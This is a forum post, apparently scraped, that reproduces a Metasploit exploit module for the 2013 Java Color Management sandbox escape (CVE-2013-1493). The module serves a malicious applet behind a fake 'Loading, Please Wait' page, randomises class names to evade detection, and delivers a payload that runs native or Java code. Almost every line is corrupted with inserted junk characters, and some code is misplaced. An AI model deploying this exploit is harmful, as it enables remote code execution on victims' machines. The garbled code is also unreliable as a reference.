##( k- M# d: ]% C% F `, z
( g P3 L/ D1 o5 m% T& `% E8 }
# This file is part of the Metasploit Framework and may be subject to" h* C0 ?4 r: f! t3 q
# redistribution and commercial restrictions. Please see the Metasploit, B9 } M* V7 ]3 J3 _) A
# web site for more information on licensing and terms of use.
% F0 M2 @2 l! w, F1 J# w# http://metasploit.com/
V- p/ [$ t7 Q! V1 b. D7 B0 o##6 j+ P. i) V- E+ g* b5 ^5 w
require ‘msf/core’5 R1 P* H3 c2 ^
require ‘rex’ K& K9 G) @; c2 M5 L
class Metasploit3 < Msf::Exploit::Remote
: r$ h* u3 T* @/ h% W" W7 KRank = NormalRanking+ M% v5 w- ?0 c* l% B4 S8 v! o6 v+ ~2 L
include Msf::Exploit::Remote::HttpServer::HTML" m( o7 u! c8 H* e$ E* Z1 C
include Msf::Exploit::EXE& B- z+ o5 w$ M, M( k
include Msf::Exploit::Remote::BrowserAutopwn4 ]; l9 N6 h% d5 G: V3 D
autopwn_info({ :javascript => false })3 X" Z/ S/ j/ f. a" f; D! N
def initialize( info = {} )
; g: D5 \1 g5 b% K2 [) O: rsuper( update_info( info,
0 c7 U6 E1 R- \‘Name’ => ‘Java CMM Remote Code Execution’,; R" | b: L9 u+ C/ p- i$ j1 P0 q
‘Description’ => %q{
" p% {% H: ^' W8 a) YThis module abuses the Color Management classes from a Java Applet to run( G; Y* z' Q5 M; }6 u
arbitrary Java code outside of the sandbox as exploited in the wild in February, \8 d7 X. G' A( a
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u413 n- n( y7 X) R; |& k# z$ R, i
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
2 s b" I0 x1 Wsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java, E) b& H1 m* h. T
warning in order to run the malicious applet.* Z; j% ~5 N' o# {) L0 D- t% [
},
* j( N. i7 _2 \3 N; `" W0 t; v s‘License’ => MSF_LICENSE,
8 A" [4 Z5 }& i# @‘Author’ =>1 A8 Z3 ?3 L1 b0 t" V
'Unknown', # Vulnerability discovery and Exploit `. P: E; F4 O/ k6 }+ x
'juan vazquez' # Metasploit module (just ported the published exploit)
6 P/ F7 A* \5 u3 c8 P],
P& O9 x6 o1 ]3 l9 f$ {& G‘References’ =>
8 b& G$ e4 S9 W& J* z[
9 G# y$ \. Q7 o2 g6 w' w[ 'CVE', '2013-1493' ],
" F) U' t& Y/ Q6 l# R[ 'OSVDB', '90737' ],8 i7 |/ T! x8 K. d
[ 'BID', '58238' ],
- \( f) B) o( D1 g/ e6 ?8 L[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
7 [4 k, K3 }/ E5 O+ e[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
, ]- U! z3 D2 a) [: r, @" e; b[ 'URL', 'http://pastie.org/pastes/6581034' ]
5 d: [, T4 O4 ~],! t; b# J& j! u2 W; ?& n' }5 F
‘Platform’ => [ 'win', 'java' ],) X( M8 E' m" Y. Y
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
; Q4 p( z5 v2 ]- R‘Targets’ =>
0 h/ e: e% H' s6 E$ k+ ^[
o* }3 X8 n% ~0 z' K[ 'Generic (Java Payload)',
! [. N! b9 p8 W1 ? m{
& Q0 w% C" Y" Z4 u! }'Platform' => 'java',
t2 K1 t- r4 k5 P' A+ x" P( g9 x% `'Arch' => ARCH_JAVA$ ^" p' @# \* b6 p: c0 p2 Q1 o
}
0 ]# I3 g/ k3 ?],
9 e( ~& z. R5 D& P* o6 [[ 'Windows x86 (Native Payload)',
$ z/ z* k6 k; I3 Q/ A{& y @1 J0 r! ~4 p8 `
'Platform' => 'win',0 O& x! x9 N8 x, p# M
'Arch' => ARCH_X86
6 m# b/ M; k3 z, H& U}: p/ c- i) l7 \( A- e* v4 h1 q
]
8 N# j; Y* J% K0 u$ u7 P],
+ C! T9 [! t1 x: `- f- N" X% R' D‘‘DisclosureDate’ => ‘Mar 01 2013′
# Z2 s k4 D B9 x4 H/ x$ k# S))' r- t7 \ C9 M$ \7 U1 N
end" u, |( `9 g1 e
def setup
! j- O4 y/ `: J' v7 }4 H6 Vpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)/ _# W+ h r6 s A/ E6 T& W" \
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 z8 a% E0 t3 gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)* e; D- `0 d) J) R. Q7 b3 O
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& h1 n0 }& w& R9 S6 ]
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
7 R/ ?& A6 l4 h% T: Y; c@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ }0 P- y: X! J" u
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)+ m- R% d! _' Y$ Q0 f
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }3 W: R3 W) T- {/ f' O, M [& o. Y. Q: s
@init_class_name = rand_text_alpha(“Init”.length)
3 A4 r" x1 ] M- W; s@init_class.gsub!(“Init”, @init_class_name)
; y, @$ J# k ]) Q$ K, ssuper1 Y, N7 I) |' _/ l0 }
end
Z3 Z7 l& }* N2 \& edef on_request_uri(cli, request)" N. F) x1 H; O: O3 S
print_status(“handling request for #{request.uri}”)) }4 [" \ ]9 u$ B) q( G
case request.uri
2 X9 Z- o" |) t# R# [when /\.jar$/i
4 |( o: W# N" |; Ijar = payload.encoded_jar
0 a2 ?7 p# r% T& Cjar.add_file(“#{@init_class_name}.class”, @init_class)
& c# \7 e% K1 N5 h* Wjar.add_file(“Leak.class”, @leak_class)9 a8 T8 J# @6 n" t+ w
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
! F! w& O* F" I' @jar.add_file(“MyColorSpace.class”, @color_space_class)
- b$ S2 \3 V, c. Y- ?3 eDefaultTarget’ => 1,
+ R. L. V7 _8 ?9 Rmetasploit_str = rand_text_alpha(“metasploit”.length)
5 ]$ r* W7 n8 v7 j$ ^6 cpayload_str = rand_text_alpha(“payload”.length)
2 X4 O$ B9 y$ E5 _! {- Vjar.entries.each { |entry|
: k, f# \2 y# q; e7 k( O! q: ]entry.name.gsub!(“metasploit”, metasploit_str)
4 {, N6 C# W4 Tentry.name.gsub!(“Payload”, payload_str)
. @' g0 I8 S6 Y5 i( Centry.data = entry.data.gsub(“metasploit”, metasploit_str)
8 \ |4 u2 B+ B' B, [entry.data = entry.data.gsub(“Payload”, payload_str)
7 Q' r3 C S& B. p5 e3 Z7 O2 \: x}
* u. r" R, x$ djar.build_manifest. m7 p6 r# @' [8 t2 a# y
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
3 i/ c' G0 E3 T' zwhen /\/$/1 n' J. B1 n* J, Y
payload = regenerate_payload(cli)3 B' n1 E2 l. J% T8 ~+ M
if not payload
' W3 K9 m: Y& l( vprint_error(“Failed to generate the payload.”): Y; f: k; G' U* h" _- Y* W
send_not_found(cli)0 a! [! B9 i2 @0 K$ w
return
8 A+ Q& @7 b" q. vend
( k1 U% A% M; T4 ?8 dsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
2 P: T3 y1 H# u2 Delse5 \0 P& D( W) p6 w1 g+ t
send_redirect(cli, get_resource() + ‘/’, ”)
7 q# S6 `+ J7 @, z% W, C- i; T# Rend
a0 ~' Y' ^" L' s7 g1 a; j. [) ~end
S. i. p9 y' u# P; P7 z Wdef generate_html
/ L6 l9 J, p3 Z- h/ Jhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
# O9 Y+ ~9 ^7 b$ [+ fhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
' W2 r! m7 r, q2 e0 Ohtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|- L5 E, W, o" E4 y4 Z" D
html += %Q|</applet></body></html>|* e7 O" q( i( m; S- }# f: s$ f
return html
3 x& j- L: B" ?' `0 v4 `( J+ send
- s9 |6 k. J5 S: B8 D( p0 ^end
( i$ ^7 J6 K( Y1 N1 `end
5 L% w7 p6 {$ V& s) o |
发表于 2013-4-4 17:31:17
收藏
支持
反对